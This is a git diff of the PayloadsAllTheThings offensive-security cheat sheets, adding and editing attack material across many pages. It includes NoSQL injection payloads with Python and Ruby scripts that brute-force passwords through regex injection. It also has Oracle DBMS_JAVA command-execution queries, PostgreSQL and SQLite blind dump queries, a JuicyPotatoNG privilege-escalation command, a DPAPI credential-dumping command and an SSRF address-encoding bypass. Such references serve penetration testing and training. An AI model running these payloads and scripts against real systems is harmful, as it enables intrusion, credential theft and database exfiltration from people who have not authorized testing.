python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [DPAPI - Extracting Passwords - HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords)
|
||||
* [DON PAPI, OU L’ART D’ALLER PLUS LOIN QUE LE DOMAIN ADMIN - LoginSecurité - CORTO GUEGUEN - 4 MARS 2022](https://www.login-securite.com/2022/03/04/don-papi-ou-lart-daller-plus-loin-que-le-avec-dpapi/)
|
@ -235,7 +235,6 @@ Attributes : 0
|
||||
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||
```
|
||||
|
||||
|
||||
## Mimikatz - Commands list
|
||||
|
||||
| Command |Definition|
|
||||
|
@ -956,9 +956,8 @@ Example: "Windows Help and Support" (Windows + F1), search for "command prompt",
|
||||
Look for vuln drivers loaded, we often don't spend enough time looking at this:
|
||||
|
||||
```powershell
|
||||
# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery
|
||||
|
||||
PS C:\Users\Swissky> driverquery.exe /fo table
|
||||
# Native binary
|
||||
PS C:\Users\Swissky> driverquery.exe /fo table /si
|
||||
Module Name Display Name Driver Type Link Date
|
||||
============ ====================== ============= ======================
|
||||
1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM
|
||||
@ -972,6 +971,7 @@ acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM
|
||||
ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM
|
||||
<SNIP>
|
||||
|
||||
# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery
|
||||
PS C:\Users\Swissky> DriverQuery.exe --no-msft
|
||||
[+] Enumerating driver services...
|
||||
[+] Checking file signatures...
|
||||
@ -1289,6 +1289,14 @@ C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
|
||||
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
|
||||
```
|
||||
|
||||
### JuicyPotatoNG
|
||||
|
||||
* [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG)
|
||||
|
||||
```powershell
|
||||
JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt
|
||||
```
|
||||
|
||||
|
||||
## EoP - Privileged File Write
|
||||
|
||||
@ -1502,5 +1510,8 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
||||
* [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html)
|
||||
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)
|
||||
* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1)
|
||||
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
||||
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
|
||||
* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)
|
||||
* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)
|
||||
* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/)
|
||||
* [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/)
|
@ -20,3 +20,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||
';sleep(5000);'
|
||||
';sleep(5000);+'
|
||||
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
|
||||
';return 'a'=='a' && ''=='
|
||||
";return(true);var xyz='a
|
||||
0;return true
|
@ -11,6 +11,7 @@
|
||||
* [Extract data information](#extract-data-information)
|
||||
* [Blind NoSQL](#blind-nosql)
|
||||
* [POST with JSON body](#post-with-json-body)
|
||||
* [POST with urlencoded body](#post-with-urlencoded-body)
|
||||
* [GET](#get)
|
||||
* [MongoDB Payloads](#mongodb-payloads)
|
||||
* [References](#references)
|
||||
@ -19,6 +20,7 @@
|
||||
|
||||
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
|
||||
* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab)
|
||||
* [Burp-NoSQLiScanner - Plugin available in burpsuite](https://github.com/matrix/Burp-NoSQLiScanner)
|
||||
|
||||
## Exploit
|
||||
|
||||
@ -70,11 +72,20 @@ Extract data with "in"
|
||||
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||
```
|
||||
|
||||
### SSJI
|
||||
|
||||
```json
|
||||
';return 'a'=='a' && ''=='
|
||||
";return 'a'=='a' && ''=='
|
||||
0;return true
|
||||
```
|
||||
|
||||
|
||||
## Blind NoSQL
|
||||
|
||||
### POST with JSON body
|
||||
|
||||
python script:
|
||||
|
||||
```python
|
||||
import requests
|
||||
@ -100,6 +111,8 @@ while True:
|
||||
|
||||
### POST with urlencoded body
|
||||
|
||||
python script:
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
@ -124,6 +137,8 @@ while True:
|
||||
|
||||
### GET
|
||||
|
||||
python script:
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
@ -138,13 +153,40 @@ u='http://example.org/login'
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
||||
payload=f"?username={username}&password[$regex]=^{password + c}"
|
||||
r = requests.get(u + payload)
|
||||
if 'Yeah' in r.text:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
print(f"Found one more char : {password+c}")
|
||||
password += c
|
||||
```
|
||||
|
||||
ruby script:
|
||||
|
||||
```ruby
|
||||
require 'httpx'
|
||||
|
||||
username = 'admin'
|
||||
password = ''
|
||||
url = 'http://example.org/login'
|
||||
# CHARSET = (?!..?~).to_a # all ASCII printable characters
|
||||
CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-'
|
||||
GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$']
|
||||
session = HTTPX.plugin(:persistent)
|
||||
|
||||
while true
|
||||
CHARSET.each do |c|
|
||||
unless GET_EXCLUDE.include?(c)
|
||||
payload = "?username=#{username}&password[$regex]=^#{password + c}"
|
||||
res = session.get(url + payload)
|
||||
if res.body.to_s.match?('Yeah')
|
||||
puts "Found one more char : #{password + c}"
|
||||
password += c
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
## MongoDB Payloads
|
||||
|
||||
```bash
|
||||
@ -165,6 +207,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||
{$gt: ''}
|
||||
[$ne]=1
|
||||
';return 'a'=='a' && ''=='
|
||||
";return(true);var xyz='a
|
||||
0;return true
|
||||
```
|
||||
|
||||
## References
|
||||
@ -173,3 +218,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|
||||
* [Testing for NoSQL injection - OWASP/WSTG](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
|
||||
* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
|
||||
* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
|
||||
* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
|
||||
|
@ -62,6 +62,15 @@ Applications that do not check for a valid CSRF token in the OAuth callback are
|
||||
|
||||
> The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
|
||||
|
||||
## Labs
|
||||
|
||||
* [Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow)
|
||||
* [Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking)
|
||||
* [OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri)
|
||||
* [Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page)
|
||||
* [Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
|
||||
|
@ -178,6 +178,10 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
|
||||
?continue={payload}
|
||||
?return_path={payload}
|
||||
```
|
||||
## Labs
|
||||
|
||||
* [DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
26
README.md
@ -1,11 +1,15 @@
|
||||
# Payloads All The Things [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
|
||||
# Payloads All The Things
|
||||
|
||||
A list of useful payloads and bypasses for Web Application Security.
|
||||
Feel free to improve with your payloads and techniques !
|
||||
Feel free to improve with your payloads and techniques !
|
||||
I :heart: pull requests :)
|
||||
|
||||
You can also contribute with a :beers: IRL, or using the sponsor button.
|
||||
You can also contribute with a :beers: IRL, or using the sponsor button
|
||||
|
||||
[![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo)
|
||||
[![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
|
||||
|
||||
An alternative display version is available at [PayloadsAllTheThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/).
|
||||
|
||||
<p align="center">
|
||||
<img src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/.github/banner.png">
|
||||
@ -36,16 +40,17 @@ You might also like the `Methodology and Resources` folder :
|
||||
- [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
|
||||
- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||
- [Subdomains Enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md)
|
||||
- [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
|
||||
- [Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md)
|
||||
- [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
|
||||
- [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
|
||||
- [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
|
||||
- [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)
|
||||
- [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
|
||||
- [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
|
||||
- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
|
||||
|
||||
|
||||
You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections.
|
||||
You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/_LEARNING_AND_SOCIALS/YOUTUBE.md) selections.
|
||||
|
||||
|
||||
👨💻 Contributions
|
||||
@ -58,4 +63,13 @@ Be sure to read [CONTRIBUTING.md](https://github.com/swisskyrepo/PayloadsAllTheT
|
||||
</a>
|
||||
</p>
|
||||
|
||||
Thanks again for your contribution! :heart:
|
||||
Thanks again for your contribution! :heart:
|
||||
|
||||
|
||||
🧙♂️ Sponsors
|
||||
-----
|
||||
|
||||
This project is proudly sponsored by these companies.
|
||||
|
||||
[<img src="https://avatars.githubusercontent.com/u/48131541?s=40&v=4">](https://github.com/vaadata)
|
||||
[<img src="https://avatars.githubusercontent.com/u/50994705?s=40&v=4">](https://github.com/projectdiscovery)
|
||||
|
@ -12,6 +12,15 @@
|
||||
|
||||
* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
|
||||
* [Smuggler](https://github.com/defparam/smuggler)
|
||||
* [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) > this tool does not offer automated exploitation. You have to identify the injection point and exploit it manually!
|
||||
|
||||
|
||||
## About CL.TE | TE.CL Vulnerabilities
|
||||
If you want to exploit HTTP Requests Smuggling manually you will face some problems especially in TE.CL vulnerability you have to calculate the chunk size for the second request(malicious request) as portswigger suggests `Manually fixing the length fields in request smuggling attacks can be tricky.`. For that reason you can use the [Simple HTTP Smuggler Generator CL.TE TE.CL](https://github.com/dhmosfunk/simple-http-smuggler-generator) and exploit the CL.TE TE.CL vulnerabilities manually and learn how this vulnerability works and how you can exploit it. This tool offers you only the second request with a valid chunk size(TE.CL) auto-generated but does not offer automated exploitation. You have to identify the injection point and exploit it manually!
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## CL.TE vulnerabilities
|
||||
|
||||
|
@ -15,6 +15,8 @@
|
||||
* [Methods by DBMS](#methods-by-dbms)
|
||||
* [References](#references)
|
||||
|
||||
:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`
|
||||
|
||||
## HQL Comments
|
||||
|
||||
```sql
|
||||
@ -134,7 +136,7 @@ public class Constants {
|
||||
|
||||
Some usable constants in well-known Java libraries:
|
||||
|
||||
```
|
||||
```ps1
|
||||
org.apache.batik.util.XMLConstants.XML_CHAR_APOS [ Apache Batik ]
|
||||
com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE [ ICU4J ]
|
||||
jodd.util.StringPool.SINGLE_QUOTE [ Jodd ]
|
||||
|
@ -77,10 +77,37 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
|
||||
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
|
||||
```
|
||||
|
||||
## Oracle SQL Command execution
|
||||
## Oracle SQL Command Execution
|
||||
|
||||
* [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)
|
||||
|
||||
### Oracle Java Execution
|
||||
|
||||
* List Java privileges
|
||||
```sql
|
||||
select * from dba_java_policy
|
||||
select * from user_java_policy
|
||||
```
|
||||
* Grant privileges
|
||||
```sql
|
||||
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
|
||||
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
|
||||
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
|
||||
```
|
||||
* Execute commands
|
||||
* 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()`
|
||||
```sql
|
||||
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
|
||||
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
|
||||
```
|
||||
* 11g R1 and R2: `DBMS_JAVA.RUNJAVA()`
|
||||
```sql
|
||||
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
|
||||
```
|
||||
|
||||
|
||||
### Oracle Java Class
|
||||
|
||||
```sql
|
||||
/* create Java class */
|
||||
BEGIN
|
||||
@ -112,3 +139,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
|
||||
|
||||
* [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
|
||||
* [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
|
||||
* [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
|
||||
* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
|
@ -34,6 +34,16 @@
|
||||
/**/
|
||||
```
|
||||
|
||||
## PostgreSQL chain injection points symbols
|
||||
```sql
|
||||
; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier.
|
||||
|| #or statement
|
||||
|
||||
# usage examples:
|
||||
/?whatever=1;(select 1 from pg_sleep(5))
|
||||
/?whatever=1||(select 1 from pg_sleep(5))
|
||||
```
|
||||
|
||||
## PostgreSQL Version
|
||||
|
||||
```sql
|
||||
@ -140,6 +150,29 @@ Note, with the above queries, the output needs to be assembled in memory. For la
|
||||
```
|
||||
|
||||
## PostgreSQL Time Based
|
||||
#### Identify time based
|
||||
|
||||
```sql
|
||||
select 1 from pg_sleep(5)
|
||||
;(select 1 from pg_sleep(5))
|
||||
||(select 1 from pg_sleep(5))
|
||||
```
|
||||
|
||||
#### Database dump time based
|
||||
```sql
|
||||
select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
|
||||
```
|
||||
|
||||
#### Table dump time based
|
||||
```sql
|
||||
select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
|
||||
```
|
||||
#### columns dump time based
|
||||
```sql
|
||||
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name limit 1
|
||||
select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from column_name where column_name='value' limit 1
|
||||
```
|
||||
|
||||
|
||||
```sql
|
||||
AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||||
|
@ -612,6 +612,13 @@ Obfuscated query
|
||||
1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2
|
||||
```
|
||||
|
||||
## Labs
|
||||
|
||||
* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)
|
||||
* [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass)
|
||||
* [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding)
|
||||
* [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection)
|
||||
|
||||
## References
|
||||
|
||||
* Detect SQLi
|
||||
|
@ -10,6 +10,7 @@
|
||||
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
|
||||
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
|
||||
* [Boolean - Extract info](#boolean---extract-info)
|
||||
* [Boolean - Error based](#boolean---error-based)
|
||||
* [Time based](#time-based)
|
||||
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
|
||||
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
|
||||
@ -77,6 +78,11 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and
|
||||
CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
|
||||
```
|
||||
|
||||
## Boolean - Error based
|
||||
|
||||
```sql
|
||||
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
|
||||
```
|
||||
|
||||
## Time based
|
||||
|
||||
@ -84,6 +90,7 @@ CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and
|
||||
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
||||
```
|
||||
|
||||
|
||||
## Remote Command Execution using SQLite command - Attach Database
|
||||
|
||||
```sql
|
||||
@ -103,3 +110,4 @@ Note: By default this component is disabled
|
||||
## References
|
||||
|
||||
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
|
||||
[SQLite Error Based Injection for Enumeration](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
|
||||
|
Before Width: | Height: | Size: 179 KiB |
@ -580,6 +580,7 @@ http://0xA9FEA9FE/ Dotless hexadecimal
|
||||
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
|
||||
http://0251.0376.0251.0376/ Dotted octal
|
||||
http://0251.00376.000251.0000376/ Dotted octal with padding
|
||||
http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
|
||||
```
|
||||
|
||||
More urls to include
|
||||
@ -828,6 +829,14 @@ curl http://rancher-metadata/<version>/<path>
|
||||
|
||||
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
|
||||
|
||||
## Labs
|
||||
|
||||
* [Basic SSRF against the local server](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost)
|
||||
* [Basic SSRF against another back-end system](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system)
|
||||
* [SSRF with blacklist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)
|
||||
* [SSRF with whitelist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter)
|
||||
* [SSRF with filter bypass via open redirection vulnerability](https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
@ -863,3 +872,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
|
||||
- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)
|
||||
- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)
|
||||
- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)
|
||||
- [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080)
|
||||
|
@ -15,7 +15,7 @@
|
||||
- [Expression Language EL - Basic injection](#expression-language-el---basic-injection)
|
||||
- [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution)
|
||||
- [Expression Language EL - Code Execution](#expression-language-el---code-execution)
|
||||
- [Freemarker](#freemarker)
|
||||
- [Java - Freemarker](#freemarker)
|
||||
- [Freemarker - Basic injection](#freemarker---basic-injection)
|
||||
- [Freemarker - Read File](#freemarker---read-file)
|
||||
- [Freemarker - Code execution](#freemarker---code-execution)
|
||||
@ -26,14 +26,15 @@
|
||||
- [Groovy - HTTP request:](#groovy---http-request)
|
||||
- [Groovy - Command Execution](#groovy---command-execution)
|
||||
- [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
|
||||
- [Handlebars](#handlebars)
|
||||
- [JavaScript - Handlebars](#handlebars)
|
||||
- [Handlebars - Command Execution](#handlebars---command-execution)
|
||||
- [Jade / Codepen](#jade--codepen)
|
||||
- [Java](#java)
|
||||
- [Java - Basic injection](#java---basic-injection)
|
||||
- [Java - Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables)
|
||||
- [Java - Retrieve /etc/passwd](#java---retrieve-etcpasswd)
|
||||
- [Jinja2](#jinja2)
|
||||
- [Django Template](#django-template)
|
||||
- [Python - Jinja2](#jinja2)
|
||||
- [Jinja2 - Basic injection](#jinja2---basic-injection)
|
||||
- [Jinja2 - Template format](#jinja2---template-format)
|
||||
- [Jinja2 - Debug Statement](#jinja2---debug-statement)
|
||||
@ -42,21 +43,22 @@
|
||||
- [Jinja2 - Read remote file](#jinja2---read-remote-file)
|
||||
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
|
||||
- [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution)
|
||||
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
|
||||
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
|
||||
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
|
||||
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
|
||||
- [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
|
||||
- [Jinja2 - Filter bypass](#jinja2---filter-bypass)
|
||||
- [Jinjava](#jinjava)
|
||||
- [Java - Jinjava](#jinjava)
|
||||
- [Jinjava - Basic injection](#jinjava---basic-injection)
|
||||
- [Jinjava - Command execution](#jinjava---command-execution)
|
||||
- [Lessjs](#lessjs)
|
||||
- [JavaScript - Lessjs](#lessjs)
|
||||
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
|
||||
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
|
||||
- [Plugins](#plugins)
|
||||
- [Mako](#mako)
|
||||
- [Python - Mako](#mako)
|
||||
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
|
||||
- [Pebble](#pebble)
|
||||
- [Java - Pebble](#pebble)
|
||||
- [Pebble - Basic injection](#pebble---basic-injection)
|
||||
- [Pebble - Code execution](#pebble---code-execution)
|
||||
- [Ruby](#ruby)
|
||||
@ -64,18 +66,24 @@
|
||||
- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
|
||||
- [Ruby - List files and directories](#ruby---list-files-and-directories)
|
||||
- [Ruby - Code execution](#ruby---code-execution)
|
||||
- [Smarty](#smarty)
|
||||
- [Twig](#twig)
|
||||
- [PHP - Smarty](#smarty)
|
||||
- [PHP - Twig](#twig)
|
||||
- [Twig - Basic injection](#twig---basic-injection)
|
||||
- [Twig - Template format](#twig---template-format)
|
||||
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
|
||||
- [Twig - Code execution](#twig---code-execution)
|
||||
- [Velocity](#velocity)
|
||||
- [Java - Velocity](#velocity)
|
||||
- [PHP - patTemplate](#pattemplate)
|
||||
- [PHP - PHPlib](#phplib-and-html_template_phplib)
|
||||
- [PHP - Plates](#plates)
|
||||
- [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
||||
Recommended tools:
|
||||
|
||||
